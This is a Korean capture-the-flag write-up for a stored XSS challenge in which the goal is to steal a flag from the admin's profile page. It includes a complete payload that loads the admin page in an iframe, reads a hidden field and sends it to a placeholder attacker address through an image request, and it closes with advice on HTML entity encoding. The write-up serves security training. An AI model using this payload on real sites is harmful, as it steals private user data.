[SegFault] (ClientScript) - Steal Info 2

[SegFault] (ClientScript)

Steal Info 2

admin 계정의 마이페이지의 정보란에 flag가 숨겨져있다! 찾아내시오!

문제 파악

본 문제의 경우 XSS 취약점을 찾고, 중요 정보가 있는 페이지와 똑같은 페이지에서 해당 정보의 document 값을 확인하고, 관리자 Bot에 해당 링크를 입력하여 공격자 서버로 실제 중요 정보가 있는 페이지의 동일한 위치에 있는 정보를 가져오는 방식으로 이루어져 있다.

하지만 현재 공격자 서버를 갖고 있지 않으므로 RequestBin을 이용하기로 한다.

우선 위의 [관리자 방문 Bot Link]에 접속하면 다음과 같은 URL 입력창을 볼 수 있다.

 

XSS 취약점을 이용하여 원하는 정보를 찾고 해당 값을 가져오기 위한 링크를 위의 URL에 입력하면 공격자 서버(ReuqestBin)로 정보가 날아오는 방식이다.

문제 링크에 접속하면 다음과 같은 창이 나온다.

우선 회원가입 후 로그인을 시도해본다.

마이페이지의 정보란에 flag가 숨겨져있다고 했으므로 우선 마이페이지로 접속해본다.

마이페이지에는 XSS 취약점을 없는것으로 판단되어 우선 중요정보를 확인해본다.

 

중요정보

마이페이지의 정보란은 Nothing Here... 라고 쓰여져 있는 부분이다. 관리자의 Info를 받아와야 하기 때문에 관리자가 해당 페이지에 접속하도록 유도하여 해당 부분에 적혀있는 값을 가져와야한다.

그러므로 해당 부분의 HTML 구조를 확인하여 document 값을 받아와야 한다.

위와 같이 해당 부분의 구조는 info라는 이름의 input 태그의 placeholder이다. 그러므로 이를 불러오면 다음과 같다.

 

XSS Point

글쓰기 기능에 XSS 취약점이 있는지 확인하기 위해 스크립트에 영향을 줄 수 있는 < ' " >가 그대로 출력되는지 확인해본다.

응답(Response)을 확인해본 결과 글의 내용 부분에서 입력값이 그대로 출력되고 있는 것을 확인하였다.

---

풀이 과정 (해결 방안)

마이페이지의 중요 정보를 가져오기 위한 페이로드(Payload)를 작성한다.

페이로드(Payload)

<iframe src="http://ctf.segfaulthub.com:4343/scriptPrac2/mypage.php?user=admin" id="targetFrame"></iframe> <script> var targetTag = document.getElementById('targetFrame'); targetTag.onload = function(){ var DOMData = targetTag.contentDocument; var secretData = DOMData.getElementsByClassName('card-text')[1].innerHTML; var i = new Image(); i.src = "https://공격자 주소/?secretData="+secretData; } </script>

iframe을 이용하여 해당 페이지에 접근하고 해당 페이지의 중요정보 부분의 document 값을 가져오도록 한다.

 

스크립트 삽입

XSS 취약점이 존재하는 글쓰기 기능을 이용하여 해당 페이로드를 글의 내용에 삽입한다.

해당 글을 읽기 위해 접근해보면 다음과 같이 스크립트가 활성화 되어 있는 것을 확인할 수 있다.

위의 글에 접근하는 URL을 관리자 Bot에 보내준다.

탈취된 관리자의 중요 정보가 공격자의 주소(RequestBin)으로 받아와지는 것을 확인할 수 있다.

위와 같이 중요 정보 부분을 받아오는 일련의 과정을 담은 URL로의 접속 유도를 통하여 원하는 flag값이 획득되는 것을 확인할 수 있다.

---

취약점에 관한 고찰

본 문제의 경우 게시글의 내용에 스크립트가 삽입 가능한 XSS 취약점을 활용하였다.
관리자가 스크립트가 삽입된 페이지로 접속하도록 유도하여 관리자가 마이페이지에 접속하였을 때의 Info 정보를 빼오는 것을 목표로 하였다.
위와 같이 XSS 취약점이 존재하면 iframe을 이용하여 다른 페이지로의 접속을 유도할 수 있기 때문에, HTML Entity를 이용하여 스크립트에 영향을 줄 수 있는 특수문자들을 변환해주도록 해야한다.

---

질문 환영, 수정 및 보완에 대한 지적 환영